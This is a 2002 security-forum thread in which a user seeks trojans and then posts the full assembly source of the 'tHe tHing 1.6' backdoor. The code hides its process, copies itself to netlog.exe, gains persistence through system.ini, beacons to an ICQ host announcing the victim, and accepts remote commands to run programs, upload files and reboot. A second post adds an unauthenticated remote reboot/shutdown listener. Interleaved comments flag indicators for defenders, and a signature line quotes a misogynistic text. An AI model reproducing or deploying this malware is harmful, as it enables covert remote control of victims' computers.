November 9th, 2002, 01:42 PM
#1
"The Thing" like Trojans
"The thing" is a small trojan (6 KB) with ICQ notification and the ability to download and execute another application. It can also be embedded in an HTML file with hex encoding (godmessage).
Are there any Assembly-coded trojans out there? Also, has anyone used "the thing" on XP or 2K?
November 9th, 2002, 01:49 PM
#2
searching for trojan horses---------------------->go to hell
November 9th, 2002, 02:13 PM
#3
November 9th, 2002, 02:15 PM
#4
If I thought you were using this info for security purposes,I'd help,but the way you speak so highly of this trojan suggests to me that's not your intention.This is not a skiddy site,it's a security site.If you'd like to learn something by all means stick around,but if you want to deface web sites and put bugs in peoples computers I'd suggest getting in the shower and practicing keeping a good grip on the soap,because you'll probably need that knowledge soon.
[shadow] I don\'t believe in anarchy.If you\'re not smart enough to beat the system it\'s your problem. [/shadow]
November 9th, 2002, 03:15 PM
#5
i`m not a kiddy anyway. Give me the percentage of visitors that knows Assembly, C++ and Vbscript, %1, %5 max %10. also most of the visitors use those information to spy their girlfriends email account. So don`t **** my mind with "use this information for educational purposes only blah blah blah.." I`ve asked trojan for monitor that files activity. "Analyzing Examples" basic step of the Software engineering, remember?
; the tHing 1.6 server
; ANALYST NOTE: source of a remote-access backdoor ("tHe tHing 1.6") posted to
; the thread as-is. The comments below describe what the code does and which
; artifacts a defender can look for; the program text itself is unchanged.
; Assembler dialect: TASM-style directives (Locals, jumps, "call proc,args"
; extended call syntax), 32-bit flat model, StdCall.
.486P
Locals
jumps
.Model Flat ,StdCall
SOCKET_ERROR equ -1 ; Winsock failure return value
; Hand-written WSADATA. NOTE(review): szDescription/szSystemStatus are declared
; as single bytes here, so this layout is far smaller than the Winsock
; definition (fixed-size string arrays); the code only passes its address to
; WSAStartup.
WSAdata STRUCT
wVersion WORD ?
wHighVersion WORD ?
szDescription BYTE ?
szSystemStatus BYTE ?
iMaxSockets WORD ?
iMaxUdpDg WORD ?
lpVendorInfo DWORD ?
WSAdata ENDS
; Hand-written sockaddr_in (16 bytes), used for connect/bind/accept below.
sockaddr_in STRUCT
sin_family WORD 0
sin_port WORD 0
sin_addr DWORD 0
sin_zero BYTE 8 dup (0)
sockaddr_in ENDS
INADDR_ANY equ 000000000h ; bind to all interfaces
AF_INET equ 2
max_size equ 1024 ; largest recv() chunk during an upload
; MessageBoxA parameters for an error dialog. MessageBoxA is declared below
; but never called in the visible code, so these four equates are unused.
mb_ok equ 0 ;MB_OK
hWnd equ 0 ;no owner window
lpText equ offset text ;pointer to the error text
lpCaption equ offset caption ;pointer to the dialog caption
; declaration of all used API-functions
; These are the static imports of the binary. Note that RegisterServiceProcess
; is NOT listed: Main resolves it at runtime with GetProcAddress, so it does
; not appear in the import table.
; --- Winsock (wsock32/ws2_32) ---
extrn WSAStartup : proc
extrn WSACleanup : proc
extrn WSAGetLastError : proc
extrn htons : proc
extrn bind : proc
extrn socket : proc
extrn listen : proc
extrn accept : proc
extrn connect : proc
extrn inet_addr : proc
extrn send : proc
extrn recv : proc
extrn closesocket : proc
extrn gethostname : proc
extrn gethostbyname : proc
extrn inet_ntoa : proc
; --- kernel32 ---
extrn Sleep : proc
extrn ExitProcess : PROC ;terminate the process
extrn MessageBoxA : PROC ;user32: show a MessageBox (declared, not called below)
extrn GetModuleHandleA : PROC ;used with GetProcAddress to find RegisterServiceProcess
extrn GetProcAddress : PROC
extrn GetCurrentProcessId : PROC
extrn ExitWindowsEx : proc ;user32: forced reboot on command 'R'
extrn ShellExecuteA : proc ;shell32: run a program on command 'S'
extrn GetWindowsDirectoryA : proc ;install path and command 'W'
extrn lstrcmp : proc
extrn lstrlen : proc
extrn lstrcat : proc
extrn lstrcpy : proc
extrn CreateFileA : proc ;upload target file
extrn OpenFile : proc
;extrn ReadFile : proc
extrn WriteFile : proc
extrn CloseHandle : proc
extrn GetCommandLineA : proc ;own path, for the self-copy
extrn CopyFileA : proc ;self-copy to <windir>\netlog.exe
extrn GetLastError : proc
extrn GetUserNameA : proc ;only referenced from commented-out code
extrn MessageBeep : proc
extrn WritePrivateProfileStringA: proc ;system.ini [boot] shell= persistence
; here begins our Data
; Initialised data. The hard-coded values below are the sample's static
; indicators: beacon host, ICQ UIN, access password, dropped filename, banner
; and the beacon's HTTP request strings.
.Data
wsa WSADATA ? ; filled by WSAStartup
sa dw AF_INET ; Family
sockport db 0,0 ; TCP Port
sockip db 0,0,0,0 ; IP Address
db 8 dup(0) ; padding; 'sa' is a hand-built sockaddr_in that the code never references ('server' is used instead)
xsysini db 'explorer.exe ',0 ; x-prefixed install strings; the code uses the copies placed in the code section (sysini/sys/boot/shell/sysadd)
xsys db 'system.ini',0
xboot db 'boot',0
xshell db 'shell',0
xsysadd db '\',0
newpath db 100 dup (0) ; <windir>\netlog.exe, built at install time
exename db 100 dup (0) ; own path, copied from the command line
;// icq
icqp db '205.188.147.55',0 ; ICQ web-pager host (duplicate of icqip; not referenced)
db 10 dup(0)
portis db '+,+Port+:+',0 ; beacon message fragments ('+' = URL-encoded space)
passis db '+,+Password+:+',0
xport db '00000',0 ; port text placed in the beacon; never updated from 'port'
to db '&to=',0
endicq db ' HTTP/1.0',0
eol db 13,10,13,10,13,10,0 ; CRLF pairs that end the HTTP request
sysname db 'netlog.exe',0 ; filename the server copies itself to under the Windows directory
db 5 dup (0)
icq db '29839368',0 ; destination ICQ UIN for the beacon
db 5 dup (0)
passw db 'fc',0 ; compiled-in access password, compared in the clear
db 10 dup (0)
nick db 'slave',0 ; not referenced; the beacon uses xnick from the code section
db 10 dup (0)
port dd 6000 ; only used as ExitWindowsEx's second argument; the listener port is the literal 6000 in start_listen
conn_socket dd 0 ; listening socket (also used for the beacon connection)
data_socket dd 0 ; connected client, 0 = none
server sockaddr_in <0,0,0,0> ; address for connect (beacon) and bind (listener)
client sockaddr_in ? ; peer address from accept
text2 db 30 dup (0) ; not referenced
saddrlen dw 16 ; accept's addrlen (declared as a word; the zero bytes after it absorb the dword write)
db 16 dup (0)
buff db 1030 dup (0) ; shared I/O buffer (recv chunk size max_size = 1024)
starticq db 'GET /scripts/WWPMsg.dll?from=Blade&fromemail=',0 ; beacon request line -- a network signature
nexticq db '&subject=+tHe+tHing+1.6&body=Victim+is+ONLINE+',0
h1 dd 0 ; not referenced
h2 dd 0 ; not referenced
packets dd 0 ; upload: announced file size
packet dd 0 ; upload: bytes received so far
pas db 0 ; 1 while an upload is in progress
f dd 0 ; upload file handle
i dd 0 ; WriteFile bytes-written out parameter
how dd 0 ; size of the last received chunk
text db "Cannot initialize socket.",0 ; error
mesaj db "the tHing 1.6 server.",0 ; banner sent on connect (22 bytes)
_spawn db "spawned.",0 ; replies to the client, one per command
_kill db "server killed.",0
_disc db "disconnected.",0
_upload db "uploaded.",0
_write db '.',0
invalid db 'invalid password.',0
_ok db 'password accepted.',0
sysini2 db 'explorer.exe ',0 ; value written back to shell= when the server is told to quit
myip db '127.0.0.1',0 ; not referenced
caption db "Error",0 ;Captionstring, 0-terminated
Kernel32 db "Kernel32.dll",0 ; module / export names for the runtime GetProcAddress lookup in Main
RSP db "RegisterServiceProcess",0
icqip db '205.188.147.55',0 ; beacon host, passed to inet_addr
db 10 dup(0)
.Code
; Entry point. Control flow (everything is one flat block of labels):
;   Main         -> hide process (Win9x RegisterServiceProcess), copy self to
;                   <windir>\netlog.exe, set system.ini [boot] shell= persistence
;   try_again    -> Winsock init; "error" closes sockets and retries every 300 ms
;   gata         -> one outbound HTTP GET to the ICQ web pager (beacon), then
;   start_listen -> TCP listener on port 6000; "again" is the command loop
; Command bytes accepted after the password: Q R S W U D (dispatch below).
Main:
push offset Kernel32
call GetModuleHandleA ; get the handle of kernel32.dll
push offset RSP
push eax
call GetProcAddress ; resolve RegisterServiceProcess at runtime (keeps it out of the import table)
mov ebx, eax ; ebx = function pointer; not checked for NULL
call GetCurrentProcessId ; get the current process's id
push 1 ; 1 = Register as Service
push eax ; process id
call ebx ; RegisterServiceProcess(pid, 1): Win9x-only export that hides the process from the task list; the export does not exist on NT/2000/XP, so there the unchecked pointer is NULL and this call faults
call GetCommandLineA ; get parameters (exe name)
mov esi,eax
inc esi ; skip the opening '"' of the quoted module path
mov edi,offset exename
; copy the command line up to the closing '"' into exename (100 bytes, no length check)
conv:
mov al,byte ptr [esi]
cmp al,22h ; 22h = '"'
jz terminat
mov byte ptr [edi],al
inc esi
inc edi
jmp conv
terminat:
; // moving part
; Install: copy self to <windir>\netlog.exe and make system.ini [boot] shell=
; read "explorer.exe netlog.exe" so the copy starts with the shell.
; Defender artifacts: %windir%\netlog.exe; a system.ini shell= line carrying
; anything beyond "explorer.exe".
call GetWindowsDirectoryA,offset newpath,100
call lstrcat,offset newpath,offset sysadd ; "\" (sysadd is stored in the code section below)
call lstrcat,offset newpath,offset sysname ; "netlog.exe"
call CopyFileA,offset exename,offset newpath,0 ; 0 = overwrite an existing file
call lstrcpy,offset buff,offset sysini ; "explorer.exe "
call lstrcat,offset buff,offset sysname
call WritePrivateProfileStringA,offset boot,offset shell,offset buff,offset sys ; system.ini [boot] shell=explorer.exe netlog.exe
try_again:mov pas,0 ; pas = 0: no upload in progress
call WSAStartup,202h,offset wsa ; request Winsock 2.2
cmp eax,SOCKET_ERROR
jnz gata
error:
; Shared failure path for every socket call below: tear down, sleep, retry.
; The process never exits on error; it loops until the network calls succeed.
call closesocket,conn_socket
call closesocket,data_socket
call WSAcleanup
call Sleep,300
jmp try_again
gata:
; // icq notification
; Outbound beacon: one HTTP/1.0 GET to the ICQ web-pager CGI on
; 205.188.147.55:80 announcing that the victim is online, with the listener
; port and password in the message body. Network signature: a GET for
; /scripts/WWPMsg.dll whose query string contains "tHe+tHing+1.6" and
; "Victim+is+ONLINE".
call socket, 2, 1, 0 ; AF_INET, SOCK_STREAM
cmp eax,-1
jz error
mov conn_socket,eax
mov cx,200
mov edi,offset buff
; zero buff+1 .. buff+200 (cx counts down from 200; edi is advanced before each store)
iary: dec cx
inc edi
mov byte ptr [edi],0
cmp cx,0
jnz iary
call htons,80
mov [server.sin_family],AF_INET
mov [server.sin_port],ax
call inet_addr,offset icqip
cmp eax,-1
jz error ; INADDR_NONE
mov [server.sin_addr],eax
call connect,conn_socket,offset server,16
cmp eax,-1
jz error
mov byte ptr buff,0
; Assemble the request:
;   GET /scripts/WWPMsg.dll?from=Blade&fromemail=<xnick>&subject=+tHe+tHing+1.6
;   &body=Victim+is+ONLINE+,+Password+:+<passw>+,+Port+:+<xport>&to=<icq> HTTP/1.0
call lstrcpy,offset buff,offset starticq
call lstrcat,offset buff,offset xnick
call lstrcat,offset buff,offset nexticq
call lstrcat,offset buff,offset passis
call lstrcat,offset buff,offset passw
call lstrcat,offset buff,offset portis
call lstrcat,offset buff,offset xport
;// Call GetUserNameA,offset username,50
;// call lstrcat,offset buff,offset useris
call lstrcat,offset buff,offset to
call lstrcat,offset buff,offset icq
call lstrcat,offset buff,offset endicq
call lstrcat,offset buff,offset eol
call lstrlen,offset buff
call send,conn_socket,offset buff,eax,0
cmp eax,-1
jz error
call closesocket,conn_socket ; the HTTP response is never read
; end of ICQ
start_listen:
; // start of server listen
; Listener: TCP port 6000 on all interfaces, backlog 5. Host indicator: a
; process with a LISTENING socket on 6000 running from %windir%\netlog.exe.
call socket, 2, 1, 0
cmp eax,0
jb error ; NOTE(review): an unsigned "below 0" never branches, so a failed socket() (INVALID_SOCKET) is not caught here
mov conn_socket,eax
call htons,6000
mov [server.sin_family],AF_INET
mov [server.sin_port],ax
mov [server.sin_addr],0 ; INADDR_ANY
call bind, conn_socket, offset server, 16
cmp eax,-1
jz error
push 5
push conn_socket
call listen ; backlog 5 (plain push/call form of the same StdCall convention)
cmp eax,-1
jz error
mov data_socket,0
again:
; Service loop. data_socket == 0 means no client: accept one and run the
; password handshake; otherwise read the next command, or the next upload
; chunk when pas == 1.
mov byte ptr buff,0
cmp data_socket,0
jnz after
call accept,conn_socket,offset client,offset saddrlen
cmp eax,-1
jz error
mov data_socket,eax
mov pas,0
call send,data_socket,offset mesaj,22,0 ; banner "the tHing 1.6 server." -- a fixed string a network sensor can match
cmp eax,-1
jz error
mov cx,12
mov edi,offset buff
; zero buff+1 .. buff+12
iarx: dec cx
inc edi
mov byte ptr [edi],0
cmp cx,0
jnz iarx
call recv,data_socket,offset buff,12,0 ; password, at most 12 bytes, sent in the clear
cmp eax,-1
jz error
call lstrcmp,offset buff,offset passw ; exact compare against the compiled-in password
cmp eax,0
jz ok
call send,data_socket,offset invalid,17,0
cmp eax,-1
jz error
mov data_socket,0 ; forget the client (the socket handle itself is not closed)
jmp again
ok: call send,data_socket,offset _ok,18,0
after: cmp pas,0
jnz upload_2 ; mid-upload: the next chunk goes to the file, not the dispatcher
mov cx,200
mov edi,offset buff
; zero buff+1 .. buff+200 before the next command read
iar: dec cx
inc edi
mov byte ptr [edi],0
cmp cx,0
jnz iar
call recv,data_socket,offset buff,200,0
cmp eax,-1
jz error
mov al,byte ptr buff ; first byte = command; S and U read their argument from buff+2 onward
; QUIT (kill server)
cmp al,'Q'
jz quit
; Reboot the computer
cmp al,'R'
jz Reboot
; Spawn program
cmp al,'S'
jz Spawn
; Get Windows Directory
cmp al,'W'
jz WinDir
; Upload File (expect U;filename;fsize)
cmp al,'U'
jz Upload
; Disconnect
cmp al,'D'
jz disconnect
jmp again ; unknown command byte: ignored
Disconnect:
; D: acknowledge, close the data socket and wait for a new connection
call send,data_socket,offset _disc,14,0
cmp eax,-1
jz error
call closesocket,data_socket
mov data_socket,0
jmp again
Upload_2:
; Upload body: packet = bytes received so far, packets = announced size.
mov eax,packet
cmp eax,packets
jl read ; signed compare
jmp close_file
read:
call recv,data_socket,offset buff,max_size,0 ; up to 1024 bytes per chunk
cmp eax,-1
jz error
mov how,eax
add packet,eax
call WriteFile,f,offset buff, how, offset i,0 ; i receives the byte count written
cmp eax,-1 ; NOTE(review): WriteFile returns a BOOL (0 on failure), so this test does not detect a failed write
jz error
call send,data_socket,offset _write,1,0 ; "." acknowledges each chunk
cmp eax,-1
jz error
jmp again
close_file:
; Upload complete: leave upload mode and close the file handle
mov pas,0
mov packets,0
call send,data_socket,offset _upload,9,0
cmp eax,-1
jz error
call CloseHandle,f
jmp again
Upload:
; U: parse "<filename>;<decimal size>" starting at buff+2, create the file
; for writing and switch the loop into upload mode (pas = 1). The filename
; is used verbatim, so the client chooses the destination path.
mov edi,offset buff+2
mov esi,edi ; esi = start of filename
here:
cmp byte ptr [edi],';'
jz _gata
inc edi
jmp here
_gata: mov byte ptr [edi],0 ; terminate the filename in place
; at this moment edi+1 = offset to filesize
; esi = offset to filename terminated in zero
; must convert filesize to integer
push esi
xor ecx,ecx ; ecx = accumulated value
inc edi
call lstrlen,edi ; eax = number of digits remaining
; For each digit: ecx += digit * 10^(remaining - 1)
_again:
xor edx,edx
mov dl,byte ptr [edi]
sub dl,"0" ; subtract '0' to turn the ASCII digit into its numeric value
mov esi,eax
dec esi ; esi = number of times to multiply by 10
push eax
mov eax,edx
push ebx
mov ebx,10
_iar:cmp esi,0
jbe __gata
mul ebx ; eax *= 10 (edx clobbered)
dec esi
jmp _iar
__gata:
pop ebx
add ecx,eax
pop eax
inc edi
dec eax
cmp eax,0
jnz _again
mov eax,ecx ; converted (eax contains fsize)
mov packet,0
mov packets,eax
mov pas,1
pop esi
call CreateFileA,esi,40000000h,1,0,2,20h,0 ; GENERIC_WRITE, FILE_SHARE_READ, CREATE_ALWAYS, FILE_ATTRIBUTE_ARCHIVE
mov f,eax ; handle not checked for INVALID_HANDLE_VALUE
jmp again
WinDir:
; W: send the Windows directory path back to the client
call GetWindowsDirectoryA,offset buff,100
mov edi,offset buff
mov al,0
mov ecx,0FFFFFFFFh
repne scasb ; find the terminating 0
sub ecx,0FFFFFFFFh
neg ecx
dec ecx ; ecx = strlen(buff)
mov eax,ecx
call send,data_socket,offset buff,eax,0
cmp eax,-1
jz error
jmp again
Spawn:
; S: ShellExecuteA(NULL, NULL, <argument>, NULL, NULL, SW_HIDE) -- runs the
; path the client supplied after the command byte, with no visible window.
call ShellExecuteA,0,0,offset buff+2,0,0,0
mov byte ptr buff,0
cmp eax,32
jl again ; ShellExecute reports success with a value > 32; failures are not reported to the client
call send,data_socket,offset _spawn,8,0
cmp eax,-1
jz error
jmp again
Reboot:
; R: forced reboot, no confirmation
call ExitWindowsEx,6,offset port ; 6 = EWX_REBOOT (2) + EWX_FORCE (4); the second argument is the address of 'port' passed as the reserved parameter
quit: jmp next
; String data placed inside the code section; the jmp above skips over it.
sysini db 'explorer.exe ',0 ; shell= prefix (note the trailing space); sysname is appended at install
sys db 'system.ini',0
boot db 'boot',0
shell db 'shell',0
sysadd db '\',0
xnick db 'neo',0 ; nick reported in the ICQ beacon
db 10 dup (0)
useris db ',+username+:+' ; only referenced from the commented-out GetUserNameA lines
username db 50 dup (0)
next:
; Q: restore shell=explorer.exe in system.ini, notify the client, close both
; sockets and exit. The copied netlog.exe is left on disk.
call WritePrivateProfileStringA,offset boot,offset shell,offset sysini2,offset sys
call send,data_socket,offset _kill,15,0
call closesocket,data_socket
call closesocket,conn_socket
call ExitProcess ; no exit code is pushed
End Main ;End of code, Main is the entrypoint
November 9th, 2002, 04:10 PM
#6
I'd actually say 10%+.There's a very high number of professionals(network,security,programming,and so on) on this site compared to most "security" sites.Even the people who aren't into computers as a profession are still intelligent and trying to learn without going the illegal route.So,I'll give you the "for educational purposes only blah blah blah."That's what this site's here for EDUCATION on how to stop people from putting crap like that on their computer.
I'm sure some people in here do use the info to spy on their girlfriends Email account,but most people in here try not to contribute to it if they can help it,but since there's no way to read someone's intentions without them telling you their intentions,all we can do is try.
[shadow] I don\'t believe in anarchy.If you\'re not smart enough to beat the system it\'s your problem. [/shadow]
November 9th, 2002, 04:34 PM
#7
Grow up and don't waste our time trying to get trojan info so you can hack into other people's PCs.
I love pizza...........Do you?
November 9th, 2002, 06:15 PM
#8
The attachment is a cool tutorial about trojans (how they work, how to remove them, how they auto-start, and so on). I thought it might be useful for those who read this thread!
by the way Utreise neggin me won't get ya anywhere brah.
Read the FAQ (trojans are considered lammmmmmmmmme).
November 9th, 2002, 06:49 PM
#9
If you are a smart person, which i really doubt. I would not post anything that has to do with finding a way to harm other peoples computers. Like everybody has been telling you this is a security site not a skiddy. We all may disagree with what somebody says sometimes, but in the end we get together to learn and teach each other. If you are going to come in here thinking that we will use our knowledge to help you harm an innocent person, well my friend you have a lot of re-thinking to do.
November 9th, 2002, 07:59 PM
#10
***************
Give me the percentage of visitors that knows Assembly, C++ and Vbscript, %1, %5 max %10
***************
Utreise, this isn't a flame; I'm following this thread to see if I can learn anything from it myself, but nobody knows you. You ask how many people here know anything, but just how much do you know? If you know anything at all, then you know 99% are full of ****. I don't 'think' you are, but I don't know that.
really, does posting code really say anything?
.386
.model flat,stdcall
option casemap:none
; ANALYST NOTE: second sample in the thread -- a small MASM32 program that
; opens a window, listens on TCP port 25 and reboots or shuts the machine
; down when it receives a one-byte command. Comments describe behaviour and
; observable artifacts; the code itself is unchanged.
CreateSocket PROTO :DWORD
inv equ invoke
include \masm32\include\windows.inc
include \masm32\include\kernel32.inc
include \masm32\include\user32.inc
include \masm32\include\shell32.inc
include \masm32\include\wsock32.inc
includelib \masm32\lib\kernel32.lib
includelib \masm32\lib\user32.lib
includelib \masm32\lib\shell32.lib
includelib \masm32\lib\wsock32.lib
.const
X_Win equ 160 ; window size in pixels
Y_Win equ 090
port equ 25 ; listening port -- the well-known SMTP port rather than a high one
WM_SOCKET equ WM_USER+100 ; private message that WSAAsyncSelect posts to the window
ICON equ 1
; one-byte command codes read from the client (see WndProc)
RESTART equ 0
SHUTDOWN equ 1
SYSLOCKUP equ 2 ; declared but never tested
.data
szShutdown db "Shutdown", 0 ; not referenced by the visible code
szRestart db "Restart", 0 ; not referenced by the visible code
szDunno db "I don't know this msg", 0 ; shown for an unrecognised command byte
ClassName db "Win32ASM_Class", 0 ; window class name -- a host-side indicator
AppName db "Server", 0 ; window title
; window class: WndProc, default cursor/icon filled in at start, COLOR_WINDOW background
wc WNDCLASSEX <SIZEOF WNDCLASSEX, CS_HREDRAW or CS_VREDRAW, offset WndProc, \
NULL, NULL, NULL, NULL, NULL, COLOR_WINDOW + 1, NULL, \
offset ClassName, NULL>
szConnect db "Connection esthablished", 0 ; not referenced by the visible code
e**** db "Something went wrong!", 0 ; NOTE(review): identifier appears mangled by the forum's word filter (same spelling at its use in WndProc)
.data?
hInstance dd ?
hwnd dd ?
X_Pos dd ? ; window position: screen centre, computed at start
Y_Pos dd ?
msg MSG <?>
sin sockaddr_in <?> ; listening address; sin_addr is never set, so it stays 0 (INADDR_ANY)
sSocket dd ? ; listening socket
wsadata WSADATA <?>
bRead dd ? ; receive buffer allocated per FD_READ event
available_data dd ? ; byte count from FIONREAD, then the recv() result
cSocket dd ? ; socket that raised the current WM_SOCKET event
.code
start:
; Entry point: ordinary Win32 window setup (a visible 160x90 window titled
; "Server", centred on the screen) followed by the message pump. All socket
; work is driven from WndProc; WM_CREATE opens the listener.
inv GetModuleHandle, NULL
mov hInstance, eax
mov wc.hInstance, eax
inv LoadIcon, hInstance, ICON
mov wc.hIcon, eax
mov wc.hIconSm, eax
inv LoadCursor, NULL, IDC_ARROW
mov wc.hCursor, eax
inv RegisterClassEx, offset wc
inv GetSystemMetrics,SM_CXSCREEN ; Calculate Screen center
shr eax, 1 ; eax = screen width / 2
sub eax, X_Win / 2
mov X_Pos, eax
inv GetSystemMetrics,SM_CYSCREEN
shr eax, 1 ; eax = screen height / 2
sub eax, Y_Win / 2
mov Y_Pos, eax
; standard overlapped window; the program does not try to hide itself
inv CreateWindowEx, NULL, offset ClassName, offset AppName, WS_OVERLAPPEDWINDOW, \
X_Pos, Y_Pos, X_Win, Y_Win, NULL, NULL, hInstance, NULL
mov hwnd, eax
inv ShowWindow, eax, SW_SHOW
inv UpdateWindow, hwnd
.while TRUE
inv GetMessage, offset msg, NULL, 0, 0
.break .if (!eax) ; WM_QUIT
inv TranslateMessage, offset msg
inv DispatchMessage, offset msg
.endw
inv ExitProcess, msg.wParam
; Window Proc
; Window procedure. Besides WM_CREATE/WM_DESTROY handling it implements the
; whole protocol: WM_SOCKET (posted by WSAAsyncSelect) delivers FD_ACCEPT and
; FD_READ, and the first byte of each read is executed as a command
; (0 = reboot, 1 = shutdown). There is no authentication of any kind: any peer
; that can reach TCP/25 on this host can reboot or power it off.
WndProc proc hWnd:HWND, uMsg:UINT, wParam:WPARAM, lParam:LPARAM
.if uMsg == WM_DESTROY
inv closesocket, sSocket
inv WSACleanup
inv PostQuitMessage, NULL
.elseif uMsg == WM_CREATE
inv WSAStartup, 101h, offset wsadata ; Winsock 1.1
inv CreateSocket, hWnd
.elseif uMsg == WM_SOCKET
mov eax, wParam ; wParam = socket the event is for
mov cSocket, eax
mov eax, lParam ; low word = network event; high word (error code) is not examined
.if ax == FD_ACCEPT
inv accept, sSocket, 0, 0 ; accepted handle is left in eax and never stored or closed; its FD_READ events still arrive through wParam, presumably because the new socket inherits the listener's WSAAsyncSelect registration
.elseif ax == FD_READ
inv ioctlsocket, cSocket, FIONREAD, offset available_data ; number of bytes pending
.if eax == NULL ; 0 = success
inv GlobalAlloc, GMEM_FIXED + GMEM_ZEROINIT, available_data
mov bRead, eax
inv recv, cSocket, bRead, available_data, 0
mov available_data, eax
; inv MessageBox, hWnd, bRead, bRead, MB_OK
mov esi, bRead
cld
lodsb ; al = first received byte = command
.if al == RESTART
inv ExitWindowsEx, EWX_REBOOT, 0
.elseif al == SHUTDOWN
inv ExitWindowsEx, EWX_SHUTDOWN, 0
.else
inv MessageBox, hWnd, offset szDunno, offset AppName, MB_OK ; unknown command: a message box appears on the host
.endif
inv GlobalFree, bRead
.else
inv MessageBox, hWnd, offset e****, offset e****, MB_OK
.endif
.endif ; FD_CLOSE is requested in CreateSocket but has no branch here
.else
inv DefWindowProc, hWnd, uMsg, wParam, lParam
ret ; returns DefWindowProc's result in eax
.endif
xor eax,eax
ret
WndProc endp
; CreateSocket(hWnd): open the TCP listener on port 25 bound to INADDR_ANY and
; have Winsock post FD_ACCEPT/FD_CLOSE/FD_READ to hWnd as WM_SOCKET messages.
; None of the Winsock return values are checked.
CreateSocket proc hWnd:DWORD
mov sin.sin_family, AF_INET
inv htons, port
mov sin.sin_port, ax ; port 25 in network byte order
inv socket, PF_INET, SOCK_STREAM, 0
mov sSocket, eax
inv WSAAsyncSelect, sSocket, hWnd, WM_SOCKET, FD_ACCEPT + FD_CLOSE + FD_READ ; event mask combined with '+'
inv bind, sSocket, offset sin, SIZEOF sin ; sin.sin_addr is still 0 = INADDR_ANY
inv listen, sSocket, 2 ; backlog 2
ret
CreateSocket endp
end start
Bukhari:V3B48N826 “The Prophet said, ‘Isn’t the witness of a woman equal to half of that of a man?’ The women said, ‘Yes.’ He said, ‘This is because of the deficiency of a woman’s mind.’”